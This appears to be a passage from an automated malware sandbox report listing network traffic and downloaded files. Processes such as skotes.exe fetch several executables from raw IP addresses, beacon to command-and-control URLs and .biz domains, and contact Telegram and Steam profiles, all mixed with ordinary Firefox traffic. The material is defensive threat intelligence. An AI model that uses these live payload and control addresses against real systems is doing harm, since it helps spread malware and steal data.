                      X-Timestamp: 1731034347.00215
                      Content-Type: application/zip
                      X-Trans-Id: tx264693c458e9421d8a991-006730bfe7dfw1
                      Cache-Control: public, max-age=252672
                      Expires: Sun, 15 Dec 2024 22:19:06 GMT
                      Date: Fri, 13 Dec 2024 00:07:54 GMT
                      Connection: keep-alive
                    • [US] DNS a19.dscg10.akamai.net  (firefox.exe)
                      Remote address:
                      8.8.8.8:53
                      Request
                      a19.dscg10.akamai.net
                      IN A
                      Response
                      a19.dscg10.akamai.net
                      IN A
                      88.221.134.209
                      a19.dscg10.akamai.net
                      IN A
                      88.221.134.155
                    • [US] DNS a19.dscg10.akamai.net  (firefox.exe)
                      Remote address:
                      8.8.8.8:53
                      Request
                      a19.dscg10.akamai.net
                      IN AAAA
                      Response
                      a19.dscg10.akamai.net
                      IN AAAA
                      2a02:26f0:a1::58dd:86d1
                      a19.dscg10.akamai.net
                      IN AAAA
                      2a02:26f0:a1::58dd:869b
                    • [US] DNS redirector.gvt1.com  (firefox.exe)
                      Remote address:
                      8.8.8.8:53
                      Request
                      redirector.gvt1.com
                      IN A
                      Response
                      redirector.gvt1.com
                      IN A
                      172.217.20.174
                    • [US] DNS redirector.gvt1.com  (firefox.exe)
                      Remote address:
                      8.8.8.8:53
                      Request
                      redirector.gvt1.com
                      IN A
                      Response
                      redirector.gvt1.com
                      IN A
                      172.217.20.174
                    • [US] DNS redirector.gvt1.com  (firefox.exe)
                      Remote address:
                      8.8.8.8:53
                      Request
                      redirector.gvt1.com
                      IN AAAA
                      Response
                      redirector.gvt1.com
                      IN AAAA
                      2a00:1450:4007:80c::200e
                    • [US] DNS r1---sn-5hnekn76.gvt1.com  (firefox.exe)
                      Remote address:
                      8.8.8.8:53
                      Request
                      r1---sn-5hnekn76.gvt1.com
                      IN A
                      Response
                      r1---sn-5hnekn76.gvt1.com
                      IN CNAME
                      r1.sn-5hnekn76.gvt1.com
                      r1.sn-5hnekn76.gvt1.com
                      IN A
                      209.85.226.6
                    • [US] DNS r1.sn-5hnekn76.gvt1.com  (firefox.exe)
                      Remote address:
                      8.8.8.8:53
                      Request
                      r1.sn-5hnekn76.gvt1.com
                      IN A
                      Response
                      r1.sn-5hnekn76.gvt1.com
                      IN A
                      209.85.226.6
                    • [US] DNS r1.sn-5hnekn76.gvt1.com  (firefox.exe)
                      Remote address:
                      8.8.8.8:53
                      Request
                      r1.sn-5hnekn76.gvt1.com
                      IN AAAA
                      Response
                      r1.sn-5hnekn76.gvt1.com
                      IN AAAA
                      2a00:1450:400e::6
                    • [US] DNS play.google.com  (firefox.exe)
                      Remote address:
                      8.8.8.8:53
                      Request
                      play.google.com
                      IN A
                      Response
                      play.google.com
                      IN A
                      216.58.214.174
                    • [US] DNS play.google.com  (firefox.exe)
                      Remote address:
                      8.8.8.8:53
                      Request
                      play.google.com
                      IN A
                      Response
                      play.google.com
                      IN A
                      216.58.214.174
                    • [FR] POST https://play.google.com/log?hasfast=true&authuser=0&format=json  (firefox.exe)
                      Remote address:
                      216.58.214.174:443
                      Request
                      POST /log?hasfast=true&authuser=0&format=json HTTP/2.0
                      host: play.google.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: */*
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      referer: https://consent.youtube.com/
                      content-type: text/plain;charset=UTF-8
                      content-length: 741
                      origin: https://consent.youtube.com
                      sec-fetch-dest: empty
                      sec-fetch-mode: no-cors
                      sec-fetch-site: cross-site
                      te: trailers
                    • [US] DNS play.google.com  (firefox.exe)
                      Remote address:
                      8.8.8.8:53
                      Request
                      play.google.com
                      IN AAAA
                      Response
                      play.google.com
                      IN AAAA
                      2a00:1450:4007:80e::200e
                    • [US] DNS consent.youtube.com  (firefox.exe)
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • [US] DNS consent.youtube.com  (firefox.exe)
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • 185.215.113.43:80
                      http://185.215.113.43/Zu7JuNko/index.php
                      http
                      skotes.exe
                      3.4kB
                      5.1kB
                      28
                      20

                      HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php ; HTTP Response: 200
                      HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php ; HTTP Response: 200
                      HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php ; HTTP Response: 200
                      HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php ; HTTP Response: 200
                      HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php ; HTTP Response: 200
                      HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php ; HTTP Response: 200
                      HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php ; HTTP Response: 200
                      HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php ; HTTP Response: 200
                      HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php ; HTTP Response: 200
                      HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php ; HTTP Response: 200
                      HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php ; HTTP Response: 200
                    • 31.41.244.11:80
                      http://31.41.244.11/files/unique2/random.exe
                      http
                      skotes.exe
                      255.6kB
                      13.4MB
                      5195
                      13585

                      HTTP Request: GET http://31.41.244.11/files/6904700471/9JTVo50.exe ; HTTP Response: 200
                      HTTP Request: GET http://31.41.244.11/files/burpin1/random.exe ; HTTP Response: 200
                      HTTP Request: GET http://31.41.244.11/files/fate/random.exe ; HTTP Response: 200
                      HTTP Request: GET http://31.41.244.11/files/encoxx/random.exe ; HTTP Response: 200
                      HTTP Request: GET http://31.41.244.11/files/hell911/random.exe ; HTTP Response: 200
                      HTTP Request: GET http://31.41.244.11/files/unique2/random.exe ; HTTP Response: 200
                    • 172.67.139.78:443
                      https://drive-connect.cyou/api
                      tls, http
                      45c3c2bb5b.exe
                      1.0kB
                      4.3kB
                      10
                      9

                      HTTP Request: POST https://drive-connect.cyou/api ; HTTP Response: 200
                    • 149.154.167.99:443
                      t.me
                      tls
                      4b025ca5ea.exe
                      385 B
                      219 B
                      5
                      5
                    • 149.154.167.99:443
                      t.me
                      tls
                      4b025ca5ea.exe
                      347 B
                      219 B
                      5
                      5
                    • 149.154.167.99:443
                      t.me
                      tls
                      4b025ca5ea.exe
                      288 B
                      219 B
                      5
                      5
                    • 149.154.167.99:443
                      t.me
                      4b025ca5ea.exe
                      190 B
                      92 B
                      4
                      2
                    • 23.214.143.155:443
                      https://steamcommunity.com/profiles/76561199807592927
                      tls, http
                      4b025ca5ea.exe
                      1.5kB
                      42.7kB
                      24
                      37

                      HTTP Request: GET https://steamcommunity.com/profiles/76561199807592927 ; HTTP Response: 200
                    • 95.216.181.44:443
                      https://95.216.181.44/
                      tls, http
                      4b025ca5ea.exe
                      1.5kB
                      2.1kB
                      9
                      8

                      HTTP Request: GET https://95.216.181.44/ ; HTTP Response: 200
                    • 95.216.181.44:443
                      https://95.216.181.44/
                      tls, http
                      4b025ca5ea.exe
                      1.3kB
                      698 B
                      8
                      7

                      HTTP Request: POST https://95.216.181.44/ ; HTTP Response: 200
                    • 95.216.181.44:443
                      https://95.216.181.44/
                      tls, http
                      4b025ca5ea.exe
                      1.3kB
                      698 B
                      8
                      7

                      HTTP Request: POST https://95.216.181.44/ ; HTTP Response: 200
                    • 95.216.181.44:443
                      https://95.216.181.44/
                      tls, http
                      4b025ca5ea.exe
                      1.3kB
                      698 B
                      8
                      7

                      HTTP Request: POST https://95.216.181.44/ ; HTTP Response: 200
                    • 95.216.181.44:443
                      https://95.216.181.44/
                      tls, http
                      4b025ca5ea.exe
                      1.4kB
                      967 B
                      9
                      8

                      HTTP Request

                      POST https://95.216.181.44/

                      HTTP Response

                      200
                    • 95.216.181.44:443
                      https://95.216.181.44/
                      tls, http
                      4b025ca5ea.exe
                      1.4kB
                      967 B
                      9
                      8

                      HTTP Request

                      POST https://95.216.181.44/

                      HTTP Response

                      200
                    • 95.216.181.44:443
                      tls
                      4b025ca5ea.exe
                      1.3kB
                      927 B
                      8
                      7
                    • 95.216.181.44:443
                      https://95.216.181.44/
                      tls, http
                      4b025ca5ea.exe
                      1.2kB
                      658 B
                      6
                      6

                      HTTP Request

                      POST https://95.216.181.44/

                      HTTP Response

                      200
                    • 185.215.113.16:80
                      http://185.215.113.16/off/random.exe
                      http
                      skotes.exe
                      118.8kB
                      5.8MB
                      2387
                      4148

                      HTTP Request

                      GET http://185.215.113.16/well/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://185.215.113.16/steam/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://185.215.113.16/off/random.exe

                      HTTP Response

                      200
                    • 104.21.58.186:443
                      https://covery-mover.biz/api
                      tls, http
                      45c3c2bb5b.exe
                      980 B
                      4.3kB
                      9
                      9

                      HTTP Request

                      POST https://covery-mover.biz/api

                      HTTP Response

                      200
                    • 185.215.113.206:80
                      http://185.215.113.206/c4becf79229cb002.php
                      http
                      1206054524.exe
                      727 B
                      625 B
                      5
                      5

                      HTTP Request

                      GET http://185.215.113.206/

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.206/c4becf79229cb002.php

                      HTTP Response

                      200
                    • 127.0.0.1:49669
                      firefox.exe
                    • 127.0.0.1:49679
                      firefox.exe
                    • 172.217.18.206:443
                      https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                      tls, http2
                      firefox.exe
                      3.9kB
                      10.5kB
                      21
                      24

                      HTTP Request

                      GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

                      HTTP Request

                      GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                    • 34.120.5.221:443
                      https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                      tls, http2
                      firefox.exe
                      3.1kB
                      13.6kB
                      16
                      20

                      HTTP Request

                      GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                    • 23.214.143.155:443
                      https://steamcommunity.com/profiles/76561199724331900
                      tls, http
                      45c3c2bb5b.exe
                      1.4kB
                      42.9kB
                      19
                      36

                      HTTP Request

                      GET https://steamcommunity.com/profiles/76561199724331900

                      HTTP Response

                      200
                    • 34.117.121.53:443
                      firefox-settings-attachments.cdn.mozilla.net
                      tls
                      firefox.exe
                      1.8kB
                      21.3kB
                      19
                      26
                    • 216.58.214.174:443
                      www.youtube.com
                      tls
                      firefox.exe
                      977 B
                      6.9kB
                      10
                      8
                    • 142.250.179.110:443
                      https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                      tls, http2
                      firefox.exe
                      3.1kB
                      76.4kB
                      36
                      67

                      HTTP Request

                      GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                    • 172.217.20.164:443
                      https://www.google.com/favicon.ico
                      tls, http2
                      firefox.exe
                      1.8kB
                      7.5kB
                      15
                      17

                      HTTP Request

                      GET https://www.google.com/favicon.ico
                    • 80.82.65.70:80
                      http://80.82.65.70/soft/download
                      http
                      777b33ea97.exe
                      34.0kB
                      1.9MB
                      577
                      1399

                      HTTP Request

                      GET http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/dll/key

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/dll/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/soft/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/soft/download

                      HTTP Response

                      200
                    • 88.221.134.155:80
                      http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                      http
                      firefox.exe
                      6.3kB
                      467.4kB
                      130
                      347

                      HTTP Request

                      GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

                      HTTP Response

                      200
                    • 172.217.20.174:443
                      redirector.gvt1.com
                      tls
                      firefox.exe
                      1.6kB
                      8.9kB
                      17
                      21
                    • 209.85.226.6:443
                      r1---sn-5hnekn76.gvt1.com
                      tls
                      firefox.exe
                      198.0kB
                      8.8MB
                      3286
                      6300
                    • 216.58.214.174:443
                      https://play.google.com/log?hasfast=true&authuser=0&format=json
                      tls, http2
                      firefox.exe
                      2.7kB
                      8.7kB
                      17
                      21

                      HTTP Request

                      POST https://play.google.com/log?hasfast=true&authuser=0&format=json
                    • 8.8.8.8:53
                      drive-connect.cyou
                      dns
                      45c3c2bb5b.exe
                      64 B
                      96 B
                      1
                      1

                      DNS Request

                      drive-connect.cyou

                      DNS Response

                      172.67.139.78
                      104.21.79.7

                    • 8.8.8.8:53
                      t.me
                      dns
                      4b025ca5ea.exe
                      50 B
                      66 B
                      1
                      1

                      DNS Request

                      t.me

                      DNS Response

                      149.154.167.99

                    • 8.8.8.8:53
                      steamcommunity.com
                      dns
                      45c3c2bb5b.exe
                      64 B
                      80 B
                      1
                      1

                      DNS Request

                      steamcommunity.com

                      DNS Response

                      23.214.143.155

                    • 8.8.8.8:53
                      se-blurry.biz
                      dns
                      45c3c2bb5b.exe
                      59 B
                      121 B
                      1
                      1

                      DNS Request

                      se-blurry.biz

                    • 8.8.8.8:53
                      zinc-sneark.biz
                      dns
                      45c3c2bb5b.exe
                      61 B
                      123 B
                      1
                      1

                      DNS Request

                      zinc-sneark.biz

                    • 8.8.8.8:53
                      dwell-exclaim.biz
                      dns
                      45c3c2bb5b.exe
                      63 B
                      125 B
                      1
                      1

                      DNS Request

                      dwell-exclaim.biz

                    • 8.8.8.8:53
                      formy-spill.biz
                      dns
                      45c3c2bb5b.exe
                      61 B
                      123 B
                      1
                      1

                      DNS Request

                      formy-spill.biz

                    • 8.8.8.8:53
                      covery-mover.biz
                      dns
                      45c3c2bb5b.exe
                      62 B
                      94 B
                      1
                      1

                      DNS Request

                      covery-mover.biz

                      DNS Response

                      104.21.58.186
                      172.67.206.64

                    • 8.8.8.8:53
                      dare-curbys.biz
                      dns
                      45c3c2bb5b.exe
                      122 B
                      246 B
                      2
                      2

                      DNS Request

                      dare-curbys.biz

                      DNS Request

                      dare-curbys.biz

                    • 8.8.8.8:53
                      print-vexer.biz
                      dns
                      45c3c2bb5b.exe
                      61 B
                      123 B
                      1
                      1

                      DNS Request

                      print-vexer.biz

                    • 8.8.8.8:53
                      youtube.com
                      dns
                      firefox.exe
                      57 B
                      73 B
                      1
                      1

                      DNS Request

                      youtube.com

                      DNS Response

                      172.217.18.206

                    • 8.8.8.8:53
                      spocs.getpocket.com
                      dns
                      firefox.exe
                      65 B
                      131 B
                      1
                      1

                      DNS Request

                      spocs.getpocket.com

                      DNS Response

                      34.117.188.166

                    • 8.8.8.8:53
                      getpocket.cdn.mozilla.net
                      dns
                      firefox.exe
                      71 B
                      174 B
                      1
                      1

                      DNS Request

                      getpocket.cdn.mozilla.net

                      DNS Response

                      34.120.5.221

                    • 8.8.8.8:53
                      prod.ads.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      98 B
                      1
                      1

                      DNS Request

                      prod.ads.prod.webservices.mozgcp.net

                      DNS Response

                      34.117.188.166

                    • 8.8.8.8:53
                      youtube.com
                      dns
                      firefox.exe
                      57 B
                      73 B
                      1
                      1

                      DNS Request

                      youtube.com

                      DNS Response

                      172.217.18.206

                    • 8.8.8.8:53
                      prod.ads.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      175 B
                      1
                      1

                      DNS Request

                      prod.ads.prod.webservices.mozgcp.net

                    • 8.8.8.8:53
                      youtube.com
                      dns
                      firefox.exe
                      171 B
                      85 B
                      3
                      1

                      DNS Request

                      youtube.com

                      DNS Request

                      youtube.com

                      DNS Request

                      youtube.com

                      DNS Response

                      2a00:1450:4007:805::200e

                    • 8.8.8.8:53
                      prod.pocket.prod.cloudops.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      98 B
                      1
                      1

                      DNS Request

                      prod.pocket.prod.cloudops.mozgcp.net

                      DNS Response

                      34.120.5.221

                    • 8.8.8.8:53
                      shavar.prod.mozaws.net
                      dns
                      firefox.exe
                      68 B
                      116 B
                      1
                      1

                      DNS Request

                      shavar.prod.mozaws.net

                      DNS Response

                      54.213.181.160
                      35.85.93.176
                      44.228.225.150

                    • 8.8.8.8:53
                      prod.pocket.prod.cloudops.mozgcp.net
                      dns
                      firefox.exe
                      164 B
                      110 B
                      2
                      1

                      DNS Request

                      prod.pocket.prod.cloudops.mozgcp.net

                      DNS Request

                      prod.pocket.prod.cloudops.mozgcp.net

                      DNS Response

                      2600:1901:0:524c::

                    • 8.8.8.8:53
                      shavar.prod.mozaws.net
                      dns
                      firefox.exe
                      204 B
                      153 B
                      3
                      1

                      DNS Request

                      shavar.prod.mozaws.net

                      DNS Request

                      shavar.prod.mozaws.net

                      DNS Request

                      shavar.prod.mozaws.net

                    • 8.8.8.8:53
                      impend-differ.biz
                      dns
                      45c3c2bb5b.exe
                      126 B
                      125 B
                      2
                      1

                      DNS Request

                      impend-differ.biz

                      DNS Request

                      impend-differ.biz

                    • 8.8.8.8:53
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      206 B
                      119 B
                      2
                      1

                      DNS Request

                      prod.content-signature-chains.prod.webservices.mozgcp.net

                      DNS Request

                      prod.content-signature-chains.prod.webservices.mozgcp.net

                      DNS Response

                      34.160.144.191

                    • 8.8.8.8:53
                      firefox-settings-attachments.cdn.mozilla.net
                      dns
                      firefox.exe
                      90 B
                      177 B
                      1
                      1

                      DNS Request

                      firefox-settings-attachments.cdn.mozilla.net

                      DNS Response

                      34.117.121.53

                    • 8.8.8.8:53
                      prod.remote-settings.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      94 B
                      110 B
                      1
                      1

                      DNS Request

                      prod.remote-settings.prod.webservices.mozgcp.net

                      DNS Response

                      34.149.100.209

                    • 8.8.8.8:53
                      prod.remote-settings.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      94 B
                      187 B
                      1
                      1

                      DNS Request

                      prod.remote-settings.prod.webservices.mozgcp.net

                    • 8.8.8.8:53
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      106 B
                      122 B
                      1
                      1

                      DNS Request

                      attachments.prod.remote-settings.prod.webservices.mozgcp.net

                      DNS Response

                      34.117.121.53

                    • 8.8.8.8:53
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      106 B
                      199 B
                      1
                      1

                      DNS Request

                      attachments.prod.remote-settings.prod.webservices.mozgcp.net

                    • 8.8.8.8:53
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      103 B
                      131 B
                      1
                      1

                      DNS Request

                      prod.content-signature-chains.prod.webservices.mozgcp.net

                      DNS Response

                      2600:1901:0:92a9::

                    • 172.217.18.206:443
                      youtube.com
                      https
                      firefox.exe
                      1.9kB
                      9.3kB
                      6
                      10
                    • 8.8.8.8:53
                      www.youtube.com
                      dns
                      firefox.exe
                      61 B
                      287 B
                      1
                      1

                      DNS Request

                      www.youtube.com

                      DNS Response

                      216.58.214.174
                      216.58.215.46
                      172.217.20.174
                      172.217.18.206
                      216.58.214.78
                      142.250.75.238
                      142.250.201.174
                      142.250.179.78
                      142.250.178.142
                      142.250.179.110
                      142.250.74.238
                      172.217.20.206

                    • 8.8.8.8:53
                      youtube-ui.l.google.com
                      dns
                      firefox.exe
                      69 B
                      277 B
                      1
                      1

                      DNS Request

                      youtube-ui.l.google.com

                      DNS Response

                      216.58.215.46
                      172.217.20.206
                      172.217.18.206
                      142.250.179.78
                      216.58.213.78
                      142.250.179.110
                      172.217.20.174
                      216.58.214.78
                      142.250.75.238
                      142.250.74.238
                      216.58.214.174
                      142.250.178.142
                      142.250.201.174

                    • 8.8.8.8:53
                      youtube-ui.l.google.com
                      dns
                      firefox.exe
                      69 B
                      181 B
                      1
                      1

                      DNS Request

                      youtube-ui.l.google.com

                      DNS Response

                      2a00:1450:4007:810::200e
                      2a00:1450:4007:808::200e
                      2a00:1450:4007:80e::200e
                      2a00:1450:4007:80c::200e

                    • 216.58.214.174:443
                      youtube-ui.l.google.com
                      https
                      firefox.exe
                      3.6kB
                      9.4kB
                      10
                      11
                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      65 B
                      93 B
                      1
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      2a00:1450:4007:818::200e

                    • 142.250.179.110:443
                      consent.youtube.com
                      https
                      firefox.exe
                      4.1kB
                      10.5kB
                      11
                      14
                    • 8.8.8.8:53
                      www.google.com
                      dns
                      firefox.exe
                      60 B
                      76 B
                      1
                      1

                      DNS Request

                      www.google.com

                      DNS Response

                      172.217.20.164

                    • 8.8.8.8:53
                      www.google.com
                      dns
                      firefox.exe
                      60 B
                      76 B
                      1
                      1

                      DNS Request

                      www.google.com

                      DNS Response

                      172.217.20.164

                    • 8.8.8.8:53
                      www.google.com
                      dns
                      firefox.exe
                      60 B
                      88 B
                      1
                      1

                      DNS Request

                      www.google.com

                      DNS Response

                      2a00:1450:4007:80c::2004

                    • 172.217.20.164:443
                      www.google.com
                      https
                      firefox.exe
                      3.3kB
                      10.7kB
                      8
                      11
                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    • 8.8.8.8:53
                      prod.balrog.prod.cloudops.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      98 B
                      1
                      1

                      DNS Request

                      prod.balrog.prod.cloudops.mozgcp.net

                      DNS Response

                      35.244.181.201

                    • 8.8.8.8:53
                      prod.balrog.prod.cloudops.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      175 B
                      1
                      1

                      DNS Request

                      prod.balrog.prod.cloudops.mozgcp.net

                    • 8.8.8.8:53
                      ciscobinary.openh264.org
                      dns
                      firefox.exe
                      70 B
                      286 B
                      1
                      1

                      DNS Request

                      ciscobinary.openh264.org

                      DNS Response

                      88.221.134.155
                      88.221.134.209

                    • 8.8.8.8:53
                      a19.dscg10.akamai.net
                      dns
                      firefox.exe
                      67 B
                      99 B
                      1
                      1

                      DNS Request

                      a19.dscg10.akamai.net

                      DNS Response

                      88.221.134.209
                      88.221.134.155

                    • 8.8.8.8:53
                      a19.dscg10.akamai.net
                      dns
                      firefox.exe
                      67 B
                      123 B
                      1
                      1

                      DNS Request

                      a19.dscg10.akamai.net

                      DNS Response

                      2a02:26f0:a1::58dd:86d1
                      2a02:26f0:a1::58dd:869b

                    • 8.8.8.8:53
                      redirector.gvt1.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      redirector.gvt1.com

                      DNS Response

                      172.217.20.174

                    • 8.8.8.8:53
                      redirector.gvt1.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      redirector.gvt1.com

                      DNS Response

                      172.217.20.174

                    • 8.8.8.8:53
                      redirector.gvt1.com
                      dns
                      firefox.exe
                      65 B
                      93 B
                      1
                      1

                      DNS Request

                      redirector.gvt1.com

                      DNS Response

                      2a00:1450:4007:80c::200e

                    • 172.217.20.174:443
                      redirector.gvt1.com
                      https
                      firefox.exe
                      3.3kB
                      9.3kB
                      8
                      10
                    • 8.8.8.8:53
                      r1---sn-5hnekn76.gvt1.com
                      dns
                      firefox.exe
                      71 B
                      116 B
                      1
                      1

                      DNS Request

                      r1---sn-5hnekn76.gvt1.com

                      DNS Response

                      209.85.226.6

                    • 8.8.8.8:53
                      r1.sn-5hnekn76.gvt1.com
                      dns
                      firefox.exe
                      69 B
                      85 B
                      1
                      1

                      DNS Request

                      r1.sn-5hnekn76.gvt1.com

                      DNS Response

                      209.85.226.6

                    • 8.8.8.8:53
                      r1.sn-5hnekn76.gvt1.com
                      dns
                      firefox.exe
                      69 B
                      97 B
                      1
                      1

                      DNS Request

                      r1.sn-5hnekn76.gvt1.com

                      DNS Response

                      2a00:1450:400e::6

                    • 209.85.226.6:443
                      r1.sn-5hnekn76.gvt1.com
                      https
                      firefox.exe
                      1.9kB
                      5.9kB
                      6
                      7
                    • 8.8.8.8:53
                      play.google.com
                      dns
                      firefox.exe
                      61 B
                      77 B
                      1
                      1

                      DNS Request

                      play.google.com

                      DNS Response

                      216.58.214.174

                    • 8.8.8.8:53
                      play.google.com
                      dns
                      firefox.exe
                      61 B
                      77 B
                      1
                      1

                      DNS Request

                      play.google.com

                      DNS Response

                      216.58.214.174

                    • 8.8.8.8:53
                      play.google.com
                      dns
                      firefox.exe
                      61 B
                      89 B
                      1
                      1

                      DNS Request

                      play.google.com

                      DNS Response

                      2a00:1450:4007:80e::200e

                    • 216.58.214.174:443
                      play.google.com
                      https
                      firefox.exe
                      3.2kB
                      9.3kB
                      7
                      10
                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    • 142.250.179.110:443
                      consent.youtube.com
                      https
                      firefox.exe
                      2.3kB
                      3.3kB
                      4
                      7
                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    MITRE ATT&CK Enterprise v15

                    Downloads

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                      Filesize

                      342B

                      MD5

                      ae28cb12d04906b24cbf14c4d0eb0e0b

                      SHA1

                      0b7e97222c6316af3b741a3f8fb830d83368e321

                      SHA256

                      83c85c334d10e8049a65a1cb87c05ca84ecfad581903af0a0c604b29038bab66

                      SHA512

                      4680455243b7907c88726b4a5eb89d3b93b8d27d1a1798607b03e27ccc02cb66422932feebcf6f2170a226e20820fb69d3dec8d8a144adbf2755a56d4f54c17f

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\download[1].htm

                      Filesize

                      1B

                      MD5

                      cfcd208495d565ef66e7dff9f98764da

                      SHA1

                      b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                      SHA256

                      5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                      SHA512

                      31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\activity-stream.discovery_stream.json.tmp

                      Filesize

                      26KB

                      MD5

                      cf9a4e9a7c2d2cd17467defdd2917f9c

                      SHA1

                      34a709618a03f1d7fe10f60a39b2946669e6e686

                      SHA256

                      6f0d0f2bc04735495a631f77061693ba5fb9ad6778887f792b3245ed1ff43d3a

                      SHA512

                      8e4ce4f5e397dff4158c0e68ac6502b9423200c4692470231b28d58f4ed973049f02aba4ce682da719ffaf36ded53e953ad0590644afd6721a49c770779099e0

                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

